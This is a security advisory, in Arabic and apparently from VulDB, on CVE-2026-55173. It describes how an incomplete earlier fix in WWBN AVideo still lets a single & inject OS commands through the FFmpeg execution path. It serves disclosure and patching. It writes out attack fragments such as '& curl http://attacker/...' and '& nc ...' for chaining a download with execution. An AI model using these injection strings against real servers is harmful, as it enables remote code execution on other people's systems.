CVE-2026-55173 in AVideo
الملخص
بحسب VulDB • 17/07/2026
تُعد WWBN AVideo منصة فيديو مفتوحة المصدر. لا تزال الإصدارات 29.0 وما دونها عرضة لهجوم حقن أوامر النظام (OS command injection) لأن الإصلاح الخاص بـ CVE-2026-33482 كان غير مكتمل ولا يزال يفشل في تحييد الرمز & المفرد (مشغل الخلفية في غلاف shell). أفاد تقرير CVE-2026-33482 بأن الدالة sanitizeFFmpegCommand() (في الملف plugin/API/standAlone/functions.php) فشلت في إزالة استبدال الأوامر بصيغة $(...)، مما سمح بحقن أوامر النظام عند نقطة الاستقبال execAsync() باستخدام sh -c. أضاف الإصلاح (الالتزام 25c8ab90) الأحرف $, (, ), {, }, \n, \r إلى فئة أحرف القائمة الممنوعة وأمر str_replace('&&', '', ...)، لكنه لم يأخذ في الاعتبار الرمز & المفرد. يبني ملف ffmpeg.json.php الأمر من خلال _decryptString(getInput('codeToExecEncrypted')). هذا هو نموذج التهديد نفسه الذي قبلته النصيحة الأمنية الأصلية ("يمكن للمهاجم الذي يستطيع صياغة حمولة مشفرة صحيحة تحقيق تنفيذ أوامر عشوائية على خادم التشفير المستقل") ونفس أساس تقييم CVSS (AV:N/AC:H/PR:N). يمكن تسلسل عدة مفصولة بـ & (مثل: تنزيل + تنفيذ). تم حظر الحمائل القائمة على إعادة التوجيه بواسطة إزالة الرمز >، لكن تنفيذ الأوامر (على سبيل المثال: & curl http://attacker/..., & nc ...، إسقاط/تشغيل ملف) لم يتم حظره. تمت معالجة هذه المشكلة من خلال هذا الالتزام: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f.
Several companies clearly confirm that VulDB is the primary source for best vulnerability data.